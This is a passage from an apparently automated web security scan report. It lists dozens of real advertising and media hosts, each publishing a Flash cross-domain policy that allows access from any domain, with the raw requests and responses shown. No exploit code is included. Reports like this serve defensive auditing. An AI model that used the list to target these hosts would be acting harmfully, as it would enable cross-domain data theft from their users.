GET /crossdomain.xml HTTP/1.0 Host: d7.zedo.com
Response
HTTP/1.0 200 OK Server: ZEDO 3G Content-Length: 248 Content-Type: application/xml ETag: "3a9d108-f8-46a2ad4ab2800" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=6034 Date: Tue, 06 Sep 2011 15:15:56 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="* " />...[SNIP]...
4.26. http://fls.doubleclick.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://fls.doubleclick.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain-policy Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Tue, 06 Sep 2011 00:24:57 GMT Expires: Wed, 07 Sep 2011 00:24:57 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 60104 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site-...[SNIP]... <allow-access-from domain="* " secure="false"/>...[SNIP]...
4.27. http://goku.brightcove.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://goku.brightcove.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: goku.brightcove.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:13:00 GMT Server: Apache Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT Content-Length: 116 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="* " secure="false" /> </cross-domain-policy>
4.28. http://gscounters.gigya.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://gscounters.gigya.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: gscounters.gigya.com
Response
HTTP/1.1 200 OK Content-Length: 341 Content-Type: text/xml Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT Accept-Ranges: bytes ETag: "c717c7c65530ca1:2b9b" Server: Microsoft-IIS/6.0 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" x-server: web202 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:56:33 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-on...[SNIP]... <allow-access-from domain="* " to-ports="80" />...[SNIP]... <allow-access-from domain="* " to-ports="443" secure="false" />...[SNIP]...
4.29. http://ib.adnxs.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ib.adnxs.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com
Response
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 15:32:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 15:32:16 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="* "/>...[SNIP]...
4.30. http://img-cdn.mediaplex.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://img-cdn.mediaplex.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: img-cdn.mediaplex.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT ETag: "1607e7-c7-45e6d21e5d800" Accept-Ranges: bytes Content-Length: 199 Content-Type: text/x-cross-domain-policy Date: Tue, 06 Sep 2011 15:37:46 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>
4.31. http://imp.fetchback.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://imp.fetchback.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: imp.fetchback.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:16 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " secure="false"/> </cross-do...[SNIP]...
4.32. http://intelligence.marykay.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://intelligence.marykay.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: intelligence.marykay.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:45:51 GMT Server: Omniture DC/2.0.0 xserver: www28 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.33. http://js.revsci.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://js.revsci.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: js.revsci.net
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Tue, 06 Sep 2011 16:45:31 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po...[SNIP]... <allow-access-from domain="* " secure="false"/>...[SNIP]...
4.34. http://l.betrad.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://l.betrad.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: l.betrad.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=315360000, public Content-Type: application/xml Date: Tue, 06 Sep 2011 14:59:07 GMT ETag: "4ded34bc=cf" Expires: Thu, 31 Dec 2037 23:55:55 GMT Last-Modified: Mon, 06 Jun 2011 20:12:44 GMT Server: Cherokee Content-Length: 207 Connection: Close <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="* " /></cross-domain-p...[SNIP]...
4.35. http://load.tubemogul.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://load.tubemogul.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: load.tubemogul.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"-1-1315229954000" Last-Modified: Mon, 05 Sep 2011 13:39:14 GMT host: rcv-srv33 Content-Type: application/xml Content-Length: 204 Date: Tue, 06 Sep 2011 16:13:01 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-poli...[SNIP]...
4.36. http://log30.doubleverify.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://log30.doubleverify.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: log30.doubleverify.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT Accept-Ranges: bytes ETag: "034d21c5697ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:04:53 GMT Connection: close Content-Length: 378 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-dom...[SNIP]... <allow-access-from domain="* " secure="false"/>...[SNIP]...
4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://netsuite.tt.omtrdc.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: netsuite.tt.omtrdc.net
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Tue, 06 Sep 2011 15:32:28 GMT Accept-Ranges: bytes ETag: W/"201-1313024241000" Connection: close Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT Content-Length: 201 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>...[SNIP]...
4.38. http://network.realmedia.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://network.realmedia.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: network.realmedia.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:34:10 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT ETag: "18d11d-d0-4666d0056ce80" Accept-Ranges: bytes Content-Length: 208 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/xml Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 15:35:10 GMT;path=/;httponly <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-p...[SNIP]...
4.39. http://now.eloqua.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://now.eloqua.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: now.eloqua.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Content-Type: text/xml Last-Modified: Tue, 26 May 2009 19:46:00 GMT Accept-Ranges: bytes ETag: "04c37983adec91:0" P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA", Date: Tue, 06 Sep 2011 15:32:12 GMT Connection: keep-alive Content-Length: 206 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-p...[SNIP]...
4.40. http://oimg.m.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oimg.m.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: oimg.m.cnbc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:07:49 GMT Server: Omniture DC/2.0.0 xserver: www282 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.41. http://oimg.nbcuni.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oimg.nbcuni.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: oimg.nbcuni.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:56:45 GMT Server: Omniture DC/2.0.0 xserver: www78 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.42. http://omni.csc.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://omni.csc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: omni.csc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:57:45 GMT Server: Omniture DC/2.0.0 xserver: www614 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.43. http://oracle.112.2o7.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oracle.112.2o7.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: oracle.112.2o7.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:06 GMT Server: Omniture DC/2.0.0 xserver: www423 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.44. http://oracleglobal.112.2o7.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: oracleglobal.112.2o7.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:27 GMT Server: Omniture DC/2.0.0 xserver: www93 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: oracleuniversity.112.2o7.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:01:45 GMT Server: Omniture DC/2.0.0 xserver: www431 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*" /> </cross-domain-policy>
4.46. http://p.brilig.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://p.brilig.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: p.brilig.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:30 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Tue, 19 Jul 2011 01:19:04 GMT ETag: "55fb9-ab-4a861e6c7f200" Accept-Ranges: bytes Content-Length: 171 X-Brilig-D: D=74 P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Connection: close Content-Type: application/xml <?xml version="1.0" ?> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only"/> <allow-access-from domain="* "/> </cross-domain-policy>
4.47. http://pg.links.channelintelligence.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pg.links.channelintelligence.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pg.links.channelintelligence.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT ETag: "eb20ee82e722c81:2faa" Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Date: Tue, 06 Sep 2011 16:45:35 GMT Content-Length: 206 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-polic...[SNIP]...
4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pg.links.origin.channelintelligence.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pg.links.origin.channelintelligence.com
Response
HTTP/1.1 200 OK Content-Length: 206 Content-Type: text/xml Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT Accept-Ranges: bytes ETag: "eb20ee82e722c81:2884" Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 16:45:38 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-polic...[SNIP]...
4.49. http://ping.crowdscience.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ping.crowdscience.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ping.crowdscience.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:56 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2 Last-Modified: Wed, 27 Apr 2011 03:48:25 GMT ETag: "c3167-e0-4a1de5011d440" Accept-Ranges: bytes Content-Length: 224 P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml" Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " secure="false"/> ...[SNIP]...
4.50. http://pix04.revsci.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pix04.revsci.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pix04.revsci.net
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Tue, 06 Sep 2011 16:45:33 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- allow Flash 7+ players to invoke JS from this server --> <cross-domain-po...[SNIP]... <allow-access-from domain="* " secure="false"/>...[SNIP]...
4.51. http://pixel.adsafeprotected.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.adsafeprotected.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"202-1313613444000" Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT Content-Type: application/xml Content-Length: 202 Date: Tue, 06 Sep 2011 15:05:41 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-polic...[SNIP]...
4.52. http://pixel.everesttech.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.everesttech.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.everesttech.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:08:45 GMT Server: Apache Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT ETag: "2051143-cb-49f19eb07d340" Accept-Ranges: bytes Content-Length: 203 Keep-Alive: timeout=15, max=999077 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-polic...[SNIP]...
4.53. http://pixel.fetchback.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.fetchback.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.fetchback.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:28 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " secure="false"/> </cross-do...[SNIP]...
4.54. http://pixel.mathtag.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.mathtag.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.mathtag.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Connection: close Content-Type: text/cross-domain-policy P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3a 32570 Connection: keep-alive Content-Length: 215 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-...[SNIP]...
4.55. http://pixel.quantserve.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.quantserve.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pixel.quantserve.com
Response
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Wed, 07 Sep 2011 14:56:57 GMT Content-Type: text/xml Content-Length: 207 Date: Tue, 06 Sep 2011 14:56:57 GMT Server: QS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-po...[SNIP]...
4.56. http://pro.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pro.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: pro.cnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Server: Microsoft-IIS/7.0 Date: Tue, 06 Sep 2011 15:02:07 GMT Via: 1.1 C aicache6 Content-Length: 203 X-Aicache-OS: 216.151.182.3:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Tue, 06 Sep 2011 15:03:20 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-poli...[SNIP]...
4.57. http://r.casalemedia.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://r.casalemedia.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: r.casalemedia.com
Response
